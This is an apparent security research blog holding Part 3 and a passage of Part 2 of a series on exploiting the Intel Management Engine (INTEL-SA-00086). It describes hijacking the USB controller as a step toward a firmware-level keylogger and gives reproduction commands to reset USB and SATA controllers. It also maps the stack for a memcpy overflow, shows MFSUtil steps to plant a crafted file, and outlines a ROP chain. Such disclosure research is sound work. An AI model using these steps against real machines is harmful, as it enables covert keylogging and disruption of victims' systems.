Exploiting Intel’s Management Engine – Part 3: USB hijacking (INTEL-SA-00086)

Posted on August 24, 2020 by kakaroto

In mid-November, a little over ~~two~~ ~~four~~ nine months ago, I wrote Part 1 and Part 2 of my series of articles about exploiting the Intel ME. I also said I’d write Part 3 by the end of the week. Oops.

Unfortunately, a lot of stuff happened, life caught up to me, then I became busy with another hobby, and then extremely busy with starting a new business of mine (a D&D Game hosting service for Foundry Virtual Tabletop). I’ve wanted to finish my third article for a while now, and I’m taking the time to do it today, though it might not be as verbose as usual because my time is very limited lately (also, it’s been so long, my memory of everything I did isn’t as fresh as I’d want it to be). Me finding a new hobby around D&D gaming and now working on my new business venture is what prompted me to start these articles in the first place, since I knew I wouldn’t have any more time to actually finish this project I started so long ago, so here’s everything I did so far, maybe someone else will finish it.

The big question when it comes to getting code execution on the Intel ME might be “Why?” Well, I thought it would be fun to try and create a keylogger that runs directly on the ME. Not many people know this, but one of the first things I did as a script kiddie was play around with keyloggers. While they have the “steal your friend’s passwords” use, I had one installed on my own PC and it was extremely useful for recovering content I’d write (before text editors or email apps had auto-save features) or using it as a log of what I did and when I did it.

How to keylog? The basics.

How can we use the ME to keylog a machine? The answer is simple, we hijack the USB controller; hence the title of this article!

We need to go back to the PT research Black Hat slides, but not the same ones I mentioned in my previous articles, not the Black Hat Europe 2017 slides, but the Black Hat Asia 2019 ones about Intel VISA (Visualization of Internal Signals Architecture).

In it, Mark Ermolov and Maxim Goryachi talk about the IOSF, the Intel On-chip System Fabric (I briefly mentioned it in Part 2) and explain that it’s used to interconnect all the IP units (USB controller, Graphics card, SATA controller, Audio controller, Ethernet adapter, etc..) of the PCH to each other.

I’m fairly certain (though not 100% sure) that the way it works is that everything is connected to the IOSF, and the IOSF decides which IP unit actually appears to be connected to what, based on their access permissions. So when you talk over the PCI bus to a device, the PCI bridge will simply proxy everything to the IOSF Primary by specifying the Dest ID based on the PCI BDF (Bus/Device/Function), so it uses the IOSF bus internally instead of an actual PCI bus. The whole thing is managed with a permission/identification system called SAI which allows the IOSF to filter the requests and redirect them accordingly.

See the following interesting tidbits from PT’s slides (IP in this context means an Intellectual Property unit):

Page 33 of Intel VISA: Through the Rabbit Hole

Page 34 of Intel VISA: Through the Rabbit Hole

That’s for the IOSF Primary, but there’s also the IOSF Sideband. My understanding of it is that everything is connected to the IOSF via the sideband too and it can be used to bypass the entire bus routes by specifying what device you want to communicate with. I’m not entirely sure yet on the exact differences between the IOSF primary and the sideband, but that’s what we used before in order to enable Red JTAG Unlock on the Dfx-Aggregator device and enable DCI on the DCI device.

Page 35 of Intel VISA: Through the Rabbit Hole

Knowing all that, we can start to poke at the USB device using its Sideband channel.

Woah there, slow down!

Ok! Maybe we can’t start right away, because we have no idea how to do any of that, just yet. I don’t want to explain however how I got to that point because it’s long and boring. The summary though is that I dumped all the addresses from the MMIO ranges that the BUP module had access to, then tried to find some patterns there. I did find a table that contained addresses, and after a while, with a lot of trial and error and some poking at the BUP code, I figured that at address 0xF00A9000 was the “ATT Bridge” that PT mentioned which has tables for mapping local addresses to a sideband channel. I have also figured out (with help from others, as always) that the format of those configuration channels are :

Offset	Size	Bits	Description
0x00	4		MMIO address used to access the SB channel
0x04	4		Size of the SB window
0x08	4		Control flags (bit 0= enabled, bit 1= locked)
0x0C	12		unused as far as I can see
0x18	4		Sideband channel
		0-7	Sideband Port ID (0x84 = Dfx-Agg device)
		8-15	Read opcode (6 = Read Private Configuration Space)
		16-23	Write opcode (7 = Read Private Configuration Space)
		24-27	BAR
		28	posted
		29	not sure
0x1C	4		Sideband access type
		0-2	Function ID
		3-7	Device ID
		8-15	Root space (0 = Main CPU, 1 = CSME)

I’ve already explained the format of the ‘Sideband channel’ in my Part 2 article, that was where the 0x70684 magic value was which was used for accessing the Dfx-Agg device (port 0x84, read opcode 6, write opcode 7).

We are also going to need to know what the Port ID for the USB controller (called the XHCI controller) is. For Skylake, it’s easy, it was in the datasheet I mentioned before, but for Apollolake, I had to brute force all the ports and try to figure out what their content was for. Eventually, I had port 0xa2 for APL, and 0xe6 for SKL.

Another thing to note, the main CPU has to be booted for this to work, otherwise the XHCI controller is not powered and doesn’t respond to any requests. I had also spent a lot of time understanding and poking at the memory segments/paging to understand how the CSME memory space is organized. I won’t bore you with that either, but I wrote scripts to dump the segment list and paging information, you will find all of that in my ipclib.

IPCLib?

That’s a little python library I wrote which uses OpenIPC’s ipccli python module. Any time I needed to do something more than once, I wrote it there and used it. There are all sorts of useful functions, but zero documentation. You can call ‘execute_asm‘ and give it a list of instructions and it will run them, you can use ‘print_registers‘ to have it dump all of your registers, use ‘step‘ or ‘stepOver‘ or ‘goUntil‘ to do step by step debugging of the CPU (because the native stepping functions in ipccli had some quirks that made it not work as expected). You should also be using the ‘asm‘ function to decompile code, because if you use OpenIPC’s asm function directly, it will corrupt the registers and things will break when you step back into the code, so I had to back them up before decompiling and restore the registers before continuing. It also has all the bruteforcing methods I wrote as well as the XHCI Controller implementation, but more on that later.

I am releasing the code to ipclib under the GPL license and it’s available on my github. Releasing this is a big part of today’s article as well.

The best thing to do with it though is to actually read the various functions available, they can be self explanatory (like ‘print_registers‘ or ‘escalate_to_ring0‘, or ‘malloc‘ for example), or can be more obscure. Some of the functions won’t make any sense (like ‘v3_resume‘ for my 3rd attempt at resuming ME execution after the exploit runs) because I used them just to test something at some point and they’ll be completely useless to everyone but I’m not bothering on cleaning up the code or documenting it (lack of time, remember?)… I guess that just makes things more fun for reverse engineers 🙂

Also note that while I’ve explained above how to access the IOSF Sideband mapping in the ATT gasket, there’s also a DRAM mapping region which I won’t bother to explain but in ipclib, you will see it be used, so we can map any DRAM region to access it from the ME, which is pretty cool.

The XHCI Controller

Back to the meat of the subject, the XHCI Controller. Can I hijack it? It turns out the answer is yes… and no… It depends on a few things.

On Apollolake, it’s easy, I can use the sideband channel to read from the USB controller, and write to its registers. I had to read the XHCI specification and write my own XHCI controller driver in python, basing it off the coreboot and seabios implementations. I can do things such as :

Reset/Initialize the USB controller
Enumerate the devices
Send commands and receives events from the USB controller
Assign a device ID for the usb devices

I didn’t get further than that due to lack of time, but it’s a simple matter of finishing my XHCI Controller (basically rewriting the coreboot implementation in python), then I would have been able to even transfer files from/to the USB flash drives I had connected to the Gigabyte Brix for testing. It’s not much, but at least I was able to see which ones were USB 2 or USB 3 and communicate with them.

On Skylake unfortunately, I was unable to access the XHCI controller via the sideband. You can see my discussion about this on https://github.com/ptresearch/IntelTXE-PoC/issues/12

As you could read from the issue linked to above, I originally thought that it was the EPMASK that was preventing access to the XHCI controller by entirely disabling the endpoint :

Eventually, I figured that it was the CP, RAC and WAC access policies that were preventing the ME from communicating with the XHCI controller via the Sideband channel.

Description of the Security CP register on Apollolake

The CP, RAC and WAC are registers that define which SAI agents (which other IP units connected to the IOSF fabric) can access the registers of the sideband. CP is “Control Policy” and defines which SAI agents can read and write the CP, RAC and WAC registers themselves. RAC is “Read Access Control” and defines which SAI agents can read the registers of the unit, while WAC is “Write Access Control” and defines which agents can write to its registers.

And the reason I know that the access control is based on the CP, RAC and WAC rather than EPMASK is because when I try to read the registers of the controller using the JTAG interface (the Tap2IOSF stateport device), it works, but more than that, when trying to read the private configuration space, I’m able to read most of it, but a small region is simply not responding to my reads, indicating that access is blocked for a specific portion of the registers, and that means those are the CP, RAC and WAC registers. It also means that while the Tap2IOSF device has read/write access, it does not have CP access which is why it can’t read those access control registers.

Since we now know that the CSME doesn’t have CP or RAC access to the XHCI Controller registers, here’s a question, does it have write access? And the answer is YES! It’s funny, while we can’t read any of the registers, we can write to them without problem (which re-confirms the assumption about CP/RAC/WAC). It’s unfortunate though that PT were mistaken when they said the CSME has a full privileged SAI to access all the devices, it’s just that its SAI agent value has broader permissions, but as we can see for Skylake, the USB controller doesn’t let the ME read any of its registers, so we can’t send commands and receive events from it. To be fair though, I think the ME does have full privileged access but I think the ME removes some of its own privileges during boot, so PT were probably right anyway. It’s unfortunately the same situation with the SATA controller too, and it might be affecting other devices as well.

How to keylog, really.

Now that we can talk to the USB controller, how can we create our keylogger? That’s of course, for Apollolake, since Skylake is challenging in a different way.

First of all, when the main CPU sets the BARs and configures the XHCI Controller’s PCI configuration space, the ME can store those values, change them so the ME is actually the one communicating with the controller and it can proxy all the commands and data back and forth between the main CPU and the controller. Basically, a Man-in-the-middle attack on the USB controller, allowing it to both monitor everything that passes through USB (including keyboard and mouse of course) and store it elsewhere (perhaps on the hard drive itself since it should be relatively easy to do the same thing with the SATA controller and control it from the ME… or it could save it in RAM and periodically send it over the network since the ME also has access to the ethernet adapter). It could also be used to emulate keystrokes, which could be fun.

To explain that further, basically once the OS has booted, it configures the XHCI Controller on the PCI bus so that it can send commands to it though a command buffer by writing the commands to an area of the RAM, and when an event happens (data becomes available) from USB, the event is written in the RAM by the XHCI controller so the main CPU can read it though the event ring, and then it can read the data transferred to/from USB through the transfer ring.

See this image (From page 57 of Intels’ xHCI document) which shows the general architecture of the communication with the XHCI controller :

General Architecture of the XHCI Interface

As you can see the Cmd Ring, Event Ring, Transfer Ring and all the Data Buffers are in the Host Memory, and the configuration of where they are is stored in the MMIO Space that is set in the PCI configuration space.

To hijack the USB, the CSME just needs to wait for the OS to boot, then it would change the configuration from the MMIO registers that the OS has set in such a way that sending commands does not do anything anymore (since the xHCI controller isn’t looking at that Cmd Ring anymore), but instead, the CSME would be the one reading the RAM, deciding if it wants to forward the command, modify it, save information from it, etc.. then writing the same (or modified) command in the actual Cmd Ring that the xHCI controller is listening to. When an event or data is received, The CSME would copy that data over to the Event Ring or Data Ring that the OS has set up. And there you go, we have full control over the USB interface with our CSME in the middle attack!

Here’s a badly drawn (my art skills are amazing!) diagram showing how the Man in the Middle attack works :

An alternative solution would be not to change any of the PCI configuration, but simply look for the command, event and transfer rings of the XHCI controller as set up by the main OS and monitor their contents directly since we can map any DRAM region to access it from the ME. By doing that, we would have less of an impact on the main CPU, with no risk of potentially decreasing the performance (especially when it comes to USB flash drive transfers), but we’d need to be able to receive interrupts from the controller. I’m not so good when it comes to interrupts, so I don’t know how that would work.

How about Skylake ?

Skylake (and Kabylake as well actually) are different because we can’t read the registers from the XHCI controller, so we can’t save the actual RAM addresses that the Host is sending command to, but since we can write to the MMIO registers, we can still do a lot of mischief. I actually had a little fun resetting the controller while the OS is booted and it caused all USB devices to stop working. I also did that on the SATA controller and all hard drives stopped responding… a lot of fun, and more of a malicious virus behavior than my original keylogger plan.

Note that I never got around to actually writing the code as a binary to run on the ME, which was ultimately my plan, which is why I’m mentioning the issue with SKL/KBL. But if I were to do the keylogger entirely using IPC commands over JTAG, then it wouldn’t be a problem since we can read from the XHCI controller via Tap2IOSF. The code I wrote in ipclib for it was mostly just a playground to test and see how it could be done from within the ME itself and I’ve confirmed that anything I’ve done so far would work exactly the same if it were executed from the ME firmware itself.

But all hope isn’t lost for getting it to work on Skylake, there are a few options still available :

We could try to find who sets the initial permissions on the USB controller as it boots (is it hardcoded in the silicon? is the ME itself setting it when it turns the power on? Or perhaps it’s configured in the PMC (Power Management Controller) or some other device) and it can be configured to give full access to the CSME’s SAI.
Instead of using the sideband channel, we could use the IOSF Primary bus directly, there’s a possibility that we could have access to it fully that.
We can perhaps read the registers by using the Tap2IOSF device if the ME is able to communicate with it directly and ask it to read the IOSF for us, emulating the commands sent via JTAG, which do actually work for reading even on SKL and KBL.
We can maybe scan the RAM to find the command/event/transfer ring buffers that the OS allocated and use them without having to read their values from the PCI configuration space
Maybe map those registers to another address by using another SAI, perhaps a subsystem of the ME or another device could have access to it (isn’t DMA doable from one PCI device to another for example?).

I’m sure that other ideas can be found and this problem can be circumvented. Unfortunately, as I said before, I don’t have time of my own to pursue this further, so perhaps someone else will.

Update from five months later: Well, I’m glad I delayed posting this since I actually see a different solution now. Thanks to Intel’s own CVE 2019-0090 whitepaper available here : https://www.intel.com/content/dam/www/public/us/en/security-advisory/documents/cve-2019-0090-whitepaper.pdf

On page 5, you’ll find this diagram that shows how the CSME sits between the CPU and USB and can communicate with it via the Sideband Fabric.

They also explain how the CSME takes care of loading FW onto the various IPs and it controls the IOMMU unit which checks for the SAI authorization. The CVE is about an exploit where someone could write to the ME’s SRAM before IOMMU is enabled, because SAI is not checked while IOMMU is disabled.

Explanation about CSME, IP, SAI and IOMMU

So, my new idea would be : Can we disable IOMMU? Since the ME controls it and is the one to enable it, then we should be able to disable it, then we would get to ignore SAI and get full access to the xHCI on Skylake without having to use a different method than what I have already built.

This also tells me that at some point, the ME does have access to it, then writes the firmware to it, then locks things up, so we could also try to find where it does that and patch that code to prevent it from happening. This is kind of like my alternate solution #1 above, but this new information seems to indicate that it’s the ME that handles it, and in the RBE module as well.

Let’s do this!

Alright, enough rambling. Let’s go ahead and get you all to reproduce what I did with step by step instructions.

Step 1 – Hardware setup

That’s easy, you first need to enable the exploit and get code execution with OpenIPC working for your machine. Either using the IntelTXE PoC code from PT if you’re using Apollolake, or using my instructions from my previous articles if on Skylake or Kabylake.

Step 2 – Software Setup

This should also be easy, you mostly need to have Intel System Studio installed and patched as explained in the IntelTXE PoC repository or my previous articles. Then get my ipclib code and import it into your ipython console with from ipclib import *

Step 3 – USB Listing (Apollolake)

If you’re on Apollolake, we can read/write to all the registers, and the xhci implementation I wrote is in the xhci object. You can poke at it in different ways, but to disrupt USB while the system is booted, in ipython ipc console, simply call :
xhci.reset()

To setup USB, reset ports and set addresses to the USB devices :
xhci.setup()

It should list the ports that are in use and show if they are USB 2 or USB 3 devices, though that’s the extent of it as the implementation was never finished.

Step 3 – USB Reset (Skylake/Kabylake)

If you are on Skylake or Kabylake, we can only write, but not read any of the registers, so using the xhci object’s methods will not work here as most of them try to read the status registers.

We can however do this simple write command :
xhci.bar_write32(0x80, 0x2)

which will enable the reset bit on the command register. This will reset the USB controller and prevent the OS from accessing devices. This means that your keyboard and mouse on the target machine will stop working immediately after doing that command, proving it works.

A little extra mischief

As I’ve poked at all sorts of PCI devices during my testing, I also did manage to disrupt the SATA controller when I wanted to. It’s the same principle as with USB though there is no SATA object to use.

The following commands should disable the SATA controller on Apollolake :

addr, _ = setup_sideband_channel(0x150100b5, rs=0, fid=0x90)
t.mem(phys(addr + 4), 4, 1)

And here is the command to use on Skylake and Kabylake, using the correct Sideband channel :

addr, _ = setup_sideband_channel(0x150100d9, rs=0, fid=0xb8)
t.mem(phys(addr + 4), 4, 1)

You can test it by booting the machine onto a linux system and doing dd if=/dev/sda bs=256 count=1 | hexdump -C to verify that the SATA device can be read (assuming /dev/sda is a SATA drive), then doing it again after running that command through JTAG to confirm that you get an Input/Output error.

If you’re looking for an explanation, then here’s what the command does :

In the case of kabylake, the fid=0xb8 is the function id where bits [7:3] are the PCI device id, and bits [2:0] are the function id, so 0xb8 means PCI device 23.0 which is the SATA device. The rootspace is 0 meaning the main CPU root space, and the sideband channel 0x150100d9 means :
bit 28 : posted (for writes)
bits 27-24: bar 5 (AHCI)
bits 23-16: write opcode 1 : WriteBar
bits 15-8: read opcode 0 : ReadBar
bits 7-0: Port ID 0xD9

Writing at the address + 4 is the AHCI register control, and writing bit 0 to 1 means reset controller.

As “simple” as that.

Conclusion

That’s it! That was the last of my series of articles. I’m sure there’s a lot more stuff I could write about on how I got to that point, but it’s all very tedious and boring (the proof that it’s boring is that I don’t remember most of it). You can probably figure some of the stuff out from the ipclib code that is in there.

I unfortunately never got around to doing my ‘antivirus-immune keylogger’, but it’s not impossible. It turned out that it needed a lot more work than I originally thought it would, and I blame it all on Intel for not providing documentation. I’m sure it could have been done in one week if I didn’t have to spend a year trying to understand how any of the underlying architecture works.

I’m sure there are a lot of other useful applications that can be done by running your own code in the ME. I’ve only done it using IPC scripts, but it should be possible to run binary executables (I know that PT did in their original exploit).

This whole experience was fun. More complex than I ever thought it would be, but still, a lot of fun. It also shows how dangerous the ME can be if someone hijacks it to run their own malicious firmware on it. The possibilities of having ME-viruses are huge, and it shows the importance of having good security and locking access to your flash chips if possible.

With this last article, I close the saga of the Intel ME reverse engineering and security research I’ve done in the last couple of years. I might still poke at it at some point, but I’m concentrating on other stuff for now, with my new business building a hosting service for D&D games being the focus of all my work. I hope the ipclib release I’m doing as well as these articles will be interesting to others and you’ll find something useful in it and perhaps it will inspire others to poke at things that weren’t really meant to be poked at.

It was fun, thanks for reading, and considering everything that’s happening in the world, stay safe!

Exploiting Intel’s Management Engine – Part 2: Enabling Red JTAG Unlock on Intel ME 11.x (INTEL-SA-00086)

Posted on November 14, 2019 by kakaroto

Hey there, friend! Long time no see! Actually.. not really, I’m starting this article right after I posted Part 1: Understanding PT’s TXE PoC.

If you haven’t read part 1, then you should do that now, because this is just a continuation of my previous post, but because of its length, I decided to split it into multiple parts.

Now that we know how the existing TXE exploit works, we need to port it to ME 11.x. Unfortunately, the systracer method is very difficult to reproduce because you only control a few bits in the return address and being able to change the return address into one that is valid, doesn’t cause a crash, and returns properly into our ROP is very difficult. In my case, I had actually started porting it to ME 11.0.0.1180 which didn’t even set the systracer values, so I had no choice but to look at the exploit explained in the BlackHat Europe 2017 presentation : Using the memcpy method.

Gathering the necessary information

I will spare you the details of showing you any reversed code or assembly and just get to the point.

The MFS partition uses chunks of 64 bytes each
The MFS read function reads to a temporary buffer of 1024 bytes and if chunks are sequential in the file system, it can read multiple chunks (up to 16) at once
The "/home/mca/eom" file in the MFS’s fitc.cfg file needs to contain one byte with value 0x00
DCI needs to be activated using the CPU straps in the IFD (Intel Flash Descriptor)
There’s an alternate execution route that could happen if there is a home partition in the MFS (file index 8), it could cause the exploit not to work, so make sure the MFS partition does not have a file in index 8 (more on that later).
Because of the above, you need to enable the HAP bit. If the ME boots completely (i.e: not disabled via HAP), then the home partition gets created in MFS and the exploit stops working. the ME crashes instead and the machine becomes unbootable.
The shared memory context structure is at offset 0x68 of the syslib context, and within it, at offset 0x28 is the pointer to the shared memory descriptors and at offset 0x2C is the number of valid shared memory descriptors.
Note that the shared memory context is within the syslib context, not merely a pointer to it, so the pointer to the shared memory descriptors is at offset 0x90 (0x68 + 0x28) of the syslib context
The shared memory block descriptors are of size 0x14 and of the format <flags, address, size, mmio, thread_id> where the flags being set to 0x11 works fine (I believe bit 0 is ‘in use’, not sure about bit 4, but it was set in the shmem of init_trace_hub) and the thread_id is set to zero in our case.

To help with the last points about the shared memory descriptors, here’s a slightly modified graphic from one of the slides of the BlackHat Europe 2017 presentation :

Slide 43 of “How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine”

My old Librem 13 is a skylake machine and I’ve used it for all my tests as it is very easy to flash and test on. It has ME version 11.0.18.1002 (if anyone wants to follow along).

Now, the first thing we need to do is figure out where our stack is. To do that, we open the BUP module in IDA, and check the very first function that gets called from the entrypoint (before the main).

That function will initialize the syslib context, the TLS structure and the stack, therefore, we’ll find in it the hardcoded values of all those things. Here’s what it looks like :

Now I know that my stack address for ME 11.0.18.1002 is 0x60000 and the syslib context is at 0x82CAC with a size of 0x218 (not useful information for now).

What I will do is to go to the entry point and follow along the push/pop/call/ret calls in order to get the full picture of the stack all the way to the memcpy that interests me, like I did in my previous article. Here’s the result :

ME 11.0.18.1002 STACK - bup_entry :
0x60000: STACK TOP
0x5FFEC: TLS

0x5FFE8: ecx - arg to bup_main
0x5FFE4: edx - arg
0x5FFE0: eax - arg
0x5FFDC: retaddr - call bup_main
  0x5FFD8: saved ebp of bup_entry

  0x5FFD4: 0 - arg to bup_run_init_scripts
  0x5FFD0: retaddr - call bup_run_init_scripts
    0x5FFCC: saved ebp of bup_main
    0x5FFC8: saved edi
    0x5FFC4: saved esi
    0x5FFC0: saved ebx
    0x5FFBC: var_10

    0x5FFB8: retaddr - call bup_init_trace_hub
      0x5FFB4: saved ebp of bup_run_init_scripts
      0x5FFB0: saved esi
      0x5FFAC: saved ebx
      0x5FC64: STACK esp-0x348
        0x5FFA8: security cookie
        0x5FC80: ct_data
        0x5FC6C: si_features
        0x5FC68: file_size
        0x5FC64: bytes_read

        0x5FC60: edx - arg to bup_dfs_read_file
        0x5FC5C: eax - arg
        0x5FC58: esi - arg
        0x5FC54: 0 - arg
        0x5FC50: "/home/bup/ct" - arg
        0x5FC4C: retaddr - call bup_dfs_read_file
          0x5FC48: saved ebp of bup_init_trace_hub
          0x5FC44: saved edi
          0x5FC40: saved esi
          0x5FC3C: saved ebx
          0x5FB9C: STACK esp-0xA0

          0x5FB98: 0 - arg to bup_read_mfs_file
          0x5FB94: edi - arg
          0x5FB90: esi - arg
          0x5FB8C: eax - arg
          0x5FB88: 7 - arg
          0x5FB84: retaddr - call bup_read_mfs_file
            0x5FB80: saved ebp of bup_dfs_reads_file

            0x5FB7C: eax - arg to bup_read_mfs_file_ext
            0x5FB78: sm_block_id - arg
            0x5FB74: size - arg
            0x5FB70: offset - arg
            0x5FB6C: file_number - arg
            0x5FB68: msf_desc - arg
            0x5FB64: retaddr - call bup_read_mfs_file_ext
              0x5FB60: saved ebp of bup_read_mfs_file
              0x5FB5C: saved edi
              0x5FB58: saved esi
              0x5FB54: saved ebx
              0x5F6E8: STACK esp-0x46C

              0x5F6E4: ebx - arg to sys_write_shared_mem
              0x5F6E0: ebx - arg
              0x5F6DC: eax - arg
              0x5F6D8: cur_offset - arg
              0x5F6D4: sm_block_id - arg
              0x5F6D0: var_478 - arg
              0x5F6CC: retaddr - call sys_write_shared_mem
                0x5F6C8: saved ebp of bup_read_mfs_file_ext
                0x5F6C4: saved edi
                0x5F6C0: saved esi
                0x5F6BC: saved ebx
                0x5F6AC: STACK esp-0x10

                0x5F6A8: ebx - arg to memcpy_s
                0x5F6A4: edi - arg
                0x5F6A0: edx - arg
                0x5F69C: esi - arg
                0x5F698: retaddr - call memcpy_s
                  0x5F694: saved ebp of sys_write_shared_mem
                  0x5F690: saved edi
                  0x5F68C: saved esi
                  0x5F688: saved ebx

                  0x5F684: copysize - arg to memcpy
                  0x5F680: edi - arg
                  0x5F67C: ebx - arg
                  0x5F678: retaddr - call memcpy  <-------------- TARGET ADDRESS 0x5F678
                    0x5FB60: saved ebp of memcpy_s
                    0x5FB5C: saved edi
                    0x5FB58: saved esi
                    0x5FB54: saved ebx

The ct_data buffer is at address 0x5FC80, which means it still is at offset 0x380 from the top of the stack. We can also see that the return address to the memcpy call is at 0x5F678 which means it's at an offset of 0x988 from the top of the stack. This is the address/value that we want to overwrite with our exploit. If we can replace that return address by one that points to our ROP, then we have succeeded.

What else do we need? It looks like that's it, right ? We set our ROPs to do whatever we want (more on that later), fill the rest of the file up to 0x380 with our syslib context such that we have a valid number of shared memory descriptor (on Apollolake, our shared memory block id was '2', but we won't take any chances, we'll use 20!), and have all our shared memory descriptors point to the same target address, then we set our TLS structure at the end of those 0x380 bytes which itself points the syslib context within our file.

Once the last chunk in the file is read, the TLS is replaced and the syslib context also is. This means that the next chunk that gets read and copied is the one that will overwrite our return address, this means that we'll add an additional chunk to the file (64 bytes) with the value that we want to write to the return address. Considering that the value we write will be returned to, it means that we can put our ROPs directly there, but we'll just do the pop esp; ret ROP not the full ones.

The MFS filesystem

Yes, that is technically all that we need, but there are a couple of problems here. The first is that we don't control the MFS file. If we use Intel's tool to add the TraceHub Configuration file, the file will be contiguous in the MFS partition which means it will be read in one shot since we've already established that the ME optimizes its MFS reads and can read up to 16 chunks in one operation. The solution to that would be to make sure that the chunks are not in sequential order and it means we need to manipulate the MFS file on our own.

For that, we need to understand how the MFS filesystem works. Thankfully, Dmitry Sklyarov (also from Positive Technologies) had his own presentation during the the same BlackHat Europe 2017 conference that explains how the ME File System works internally. You can read all about it in his slides. Moreover, he has released a small tool called parseMFS which can be used to extract files from an MFS partition.

Unfortunately, parseMFS does not let you add or manipulate the MFS partition in any way, so I wrote my own tool, MFSUtil which uses the knowledge shared by Dmitry in his presentation and lets us manipulate the MFS partition any way we want. More specifically, it lets us :

Replace the "/home/bup/ct" file directly with our exploit.
Replace the "/home/mca/eom" so its content is 0 if needed.
'De-optimize' the file so the chunks are never in sequence, forcing the ME to read each chunk separately.
Align the file on start/end chunk boundaries

That last one is because, while we're lucky and 0x380 ends on a chunk boundary, it will not always be the case (for example, ME 11.0.0.1180 has the ct_data at offset 0x384), so you would need the ct file to be aligned in such a way that the last byte ends on the last byte of a chunk, so when that chunk is read, the entire TLS structure is replaced, not just part of it, and the small ROP we write to replace the memcpy's return address is indeed the one that gets written, rather than the last bytes of the TLS structure.

I have now released the MFSUtil tool on github (and wow, my initial commit of it was in April 2018, I hadn't realized that it's actually been more than a year that I've started working on this), and if you look at the examples directory, you'll find the script that I use to generate a new coreboot image with an exploited ct file, but it basically does this :

# Extract file number 7 (fitc.cfg)
../MFSUtil.py -m MFS.part -x -i 7 -o 7.cfg

# Remove the /home/bup/ct file from it
../MFSUtil.py -c 7.cfg -r -f /home/bup/ct -o 7.cfg.noct

# Add the new ct file as /home/bup/ct
../MFSUtil.py -c 7.cfg.noct --add ct --alignment 2 --mode ' ---rwxr-----' --opt '?--F' --uid 3 --gid 351 -f /home/bup/ct -o fitc.cfg

# Delete file id 8 (home) from the MFS partition
../MFSUtil.py -m MFS.part -r -i 8 -o MFS.no8

# Delete file id 7 (fitc.cfg) from the MFS partition
../MFSUtil.py -m MFS.no8 -r -i 7 -o MFS.no7

# Add the modified fitc.cfg into the MFS partition
../MFSUtil.py -m MFS.no7 -a fitc.cfg --deoptimize -i 7 -o MFS.new

I'm not going to waste my time here explaining how the file system works or how the tool works. Dmitry explained the inner workings of the MFS partition very well in his presentation at BlackHat Europe 2017, and you can use the --help option of the tool (or read its README file) to figure out how to use it. The important part is that this does everything you need to make sure the ct file is in the MFS partition in the proper way so that the exploit would work.

ROPs: Return Oriented Programming

This is where it gets a little bit more interesting. The ROPs used are going to be very simple, we need to enable red unlock and do an infinite loop, oh and find pop esp; ret.

If you're not familiar with Return Oriented Programming, well.. this post is probably too in-depth for you already and I'm not going to do a tutorial on ROP (maybe some other time), but the basic premise is that if you can't write your own code to be executed, then you can use the existing code and create a fake stack where a few instructions at the end of an existing/legitimate function are executed then the function returns to the next instructions you want to execute. By chaining all these "ROP Gadgets" you can make it do whatever you want.

If you've seen my analysis of the ROPs from the previous article, then you've seen that for TXE, they do this :

// Enable DCI
side_band_mapping(0x706a8, 0x100); 
put_sel_word(0x19F, 0, 0x1010); // Sets 0x19F:0 to 0x1010

// Set DfX-agg personality
side_band_mapping(0x70684, 0x100);
put_sel_word(0x19F, 0x8400, 3); // Sets 0x19F:8400 to 3

loop();

But there are two things of interests here, first, we don't need to enable DCI because if you've read the BlackHat Europe 2017 presentation from Maxim Goryachi and Mark Ermolov, you know that you need to have DCI enabled before you execute the exploit, otherwise, the DfX Aggregator consent register will be locked, so we enable DCI using the CPU strap in the Intel Flash Descriptor. So there is only one thing we need to do : set the DfX-Agg personality value to 3. Now as you've seen above, there are a few magic numbers here, what's 0x70684 and why segment 0x19F and offset 0x8400. To explain that, let's talk a bit about the Sideband interface

IOSF Sideband

I won't go too in depth in explanation about the IOSF Sideband as I will explore it much more in depth in part 3 of this series of articles. No, the IOSF is not the International Otter Survival Fund, though that's the first result Google gives me and it's a lot cuter than Intel's version of that acronym. IOSF stands for Intel On-Chip System Fabric, and I think it's just a fancy word for saying "a hub that everything connects to".

The way I understand it (and maybe I'm wrong on some level, if that's the case, I'm blaming it on my attempts to simplify the explanation, but clearly I knew what I was talking about... ahumm.. ), is that Intel's optimizations of their chips has led them to use an architecture where you have every IP core connected to the IOSF (remember my tutorial on how computers work from last month? think of the full adder as an IP core, and the ALU as connecting multiple IP cores together, only in this case, we're talking about the PCH chipset and each IP core is going to be a device, such as USB controller, SATA controller, Graphics card, Ethernet controller, PCIe controller, GPIO controllers, DCI controller, DfX Aggregator, SPI, Audio, etc..). So yeah, every IP core is connected to the IOSF and from there, everything can communicate with everything, as long as they are authorized to do so.

So when the CPU wants to talk to the USB controller, it will talk to the PCH via the PCI controller and the PCI bridge will talk to the USB controller via the IOSF and forward the commands over. The sideband is a way to communicate with a device directly by passing through the IOSF and telling it which device we want to talk to and how, rather than using whatever bus was designed to communicate with the device.

The magic value 0x70684 you saw before can actually be divided into these attributes :

bit 29: 0 - not sure...
bit 28: 0 - posted
bits 27-24: 0 - BAR
bits 23-16: 0x07 - Write opcode
bits 15-8: 0x06 - Read opcode
bits 7-0: 0x84 - Sideband Port ID

Things I've learned about it : The read opcode is always an even number, the write opcode is the same +1 (read 0, write 1, read 2, write 3, etc.. ), also these are the read/write opcodes that I know :

Opcode 0 : Read/Write BAR
Opcode 2 : Unused?
Opcode 4 : Read/Write PCI Configuration Space
Opcode 6 : Read/Write Private Configuration Space

Now finding the Sideband Port ID, that's the interesting bit. It's easy to find some for skylake, just grab the 100-series PCH datasheet volume 1 from Intel, and look at the last two pages on the Primary to Sideband Bridge chapter, you'll find them listed :

There are more, and you can see 0xB8 is the port ID for DCI though we don't need it. The problem is that the DfX-Agg device is not listed in the datasheet because it's not a 'publicly available device' (it's only meant for the ME to poke at) and we need to find it on our own by looking at the BUP assembly. I won't bore you with the details (mostly because quite honestly, I don't remember how I found it) but the Port ID is 0xB7.

Actually, the BUP module has the DfX-Agg device already mapped to MMIO so it can use it, so by looking at the init scripts that get executed before bup_init_trace_hub, I can find the function bup_init_dci which is really easy to find (and thankfully, I've seen what it looks like already in slide 27 of the 34th CCC presentation). The function looks pretty much like this :

void bup_init_dci() {
  int pch_strap0;
  bup_get_pch_straps(0, &pch_strap0);

  if (!(pch_strap0 & 2))
    bup_disable_dci();
  else
    bup_enable_dci();
  if (bup_is_dci_enabled())
    bup_set_dfx_agg_consent();
  else
    bup_lock_dfx_agg();
  // Stack Guard
}

And then, looking at the bup_set_dfx_agg_consent function, it looks like this :

void bup_set_dfx_agg_consent() {
